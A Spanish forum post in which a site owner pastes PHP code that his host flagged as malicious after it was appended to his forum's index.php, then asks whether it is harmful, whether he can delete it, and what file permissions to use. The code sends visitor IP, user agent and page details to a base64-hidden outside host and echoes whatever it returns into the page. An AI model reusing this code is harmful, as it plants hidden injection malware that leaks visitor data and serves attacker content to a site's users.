Quería dejaros un script que el sistema de seguridad de mi hosting ha señalado como malicioso. Se ha inoculado al final del fichero raíz index.php y es como sigue:
Código: Seleccionar todo
<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
// This code use for global bot statistic
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google
serch bot
$stCurlHandle = NULL;
$stCurlLink = "";
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo')
== false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn')
== false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent,
'chrome') == false)&&(strstr($sUserAgent, 'bing') ==
false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') ==
false)) // Bot comes
{
if(isset($_SERVER['REMOTE_ADDR']) == true &&
isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
$stCurlLink = base64_decode(
'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw').
'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).
'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.
urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
@$stCurlHandle = curl_init( $stCurlLink );
}
}
if ( $stCurlHandle !== NULL )
{
curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O")
{$sResult[0]=" ";
echo $sResult; // Statistic code end
}
curl_close($stCurlHandle);
}
}
?>¿Alguien me puede confirmar si realmente es malicioso?
¿Podría eliminarlo íntegra y directamente sin que altere el correcto funcionamiento del foro?
¿Qué código de permisos ChMods recomendáis para este fichero? Ahora mismo lo han pasado a w(0200) y no da acceso al Índice General.
Si uno dista mucho de considerarse experto en temas php, no hablemos de seguridad. Para echarse a temblar ...
NOTA: Si este no es el foro para esta cuestión, ruego a los administradores que lo reubiquen.
Gracias como siempre,
Juanma